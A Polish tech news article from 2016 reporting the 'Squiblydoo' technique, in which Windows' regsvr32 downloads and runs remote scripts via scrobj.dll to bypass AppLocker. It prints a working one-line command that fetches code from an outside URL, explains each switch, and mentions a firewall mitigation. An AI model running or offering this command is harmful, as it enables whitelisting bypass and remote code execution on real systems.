Regsvr32 uruchamia skrypty z Sieci. Jedną komendą złamiesz Windowsa
22.04.2016 19:34
Zalogowani mogą więcej
Możesz zapisać ten artykuł na później. Znajdziesz go potem na swoim koncie użytkownika
Być może to nie błąd, lecz po prostu niezamierzonafunkcjonalność Windowsa. Na pewno jednak odkryte przez CaseyaSmitha działanie systemowego narzędzia Regsvr32, przeznaczonego dorejestrowania plików DLL w Rejestrze wzbudzi spore zainteresowaniezarówno wśród cyberprzestępców, jak i np. uczniów w szkołach.Któż się spodziewał, że pozwoli ono całkowicie obejśćsystemowe zabezpieczenia i uruchamiać w Windowsie dowolne skrypty?
AppLocker wykorzystywany jest już od czasów wprowadzenia narynek Windowsa 7 do blokowania użytkownikom dostępu doniepożądanych skryptów i aplikacji – i do tej pory byłskutecznym sposobem na zamknięcie „okienek”. Okazuje sięjednak, że Regsvr32 (Microsoft Register Server), będący podpisanąprzez Microsoft binarką, domyślnie obecną w systemie, pozwala napobranie z Sieci i uruchomienie dowolnego kodu w JavaScripcie lubVBScripcie i jego uruchomienie. Kod ten zaś może uruchomić dowolnąaplikację w systemie, omijając wszelkie zabezpieczenia Windowsa.
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
W przykładzie podanym przez The Register, który jako pierwszypoinformował o tej ciekawej możliwości, regsvr32 wywoływany jestz czterema przełącznikami. /s wycisza komunikaty, /n nakazuje niekorzystać z komponentu DllRegisterServer, /i przekazuje opcjonalnyparametr do funkcji DllInstall (tutaj skrypt, który nakazujeuruchomić konsolę CMD.exe) , zaś /u oznacza próbęodrejestrowania obiektu. Widoczna w wywołaniu biblioteka scrobj.dllto Microsoft Script Component Runtime.
Jeśli więc regsvr32 dostanie URL, pod którym znajdować siębędzie plik XML z uruchamialnym kodem, to pobierze go po HTTP lubHTTPS i uruchomi, poprzez próbę odrejestrowania pliku DLL. Nietrzeba tu żadnych specjalnych uprawnień, okna są szeroko otwartedla każdego.
Odkrywca tej „funkcjonalności”, która daje zupełnie nowemożliwości w dziedzinie penetrowania Windowsów, przygotował jużcały zbiór skryptów, które można w ten sposób uruchomić.Możecie je znaleźć naGitHubie – pomogą sprawdzić, na ile Wasze systemy są na topodatne.
Znany ekspert od systemów Microsoftu Alex Ionescu zachwyca sięodkryciem. To w końcu wbudowane w system zdalne uruchamianie kodubez uprawnień administratora, które omija mechanizm białych list,nie pozostawia śladów na dysku, nie dotyka Rejestru i można towszystko w dodatku schować w zaszyfrowanej sesji HTTPS. Jak do tejpory łatek nie ma. Jedyne co pozostaje administratorom, tozablokować dostęp do Sieci dla regsvr32 na poziomie zaporysieciowej.
![Surface Laptop Copilot+ PC: o wyższości ARM nad AI [RECENZJA]](https://v.wpimg.pl/MzUyOWI4Yhs0GzlkZk9vDndDbT4gFmFYIFt1dWYCeQJjTWAxIFgoCDAJIHkuRjgKNA4_eTlYYhslEGAheBspEyYJIzYwGygXNxwreC9RekNlTnZjZAR0TzNUezV6BGBCMxgpenFQe0lgS3Y1cQR6THcE)
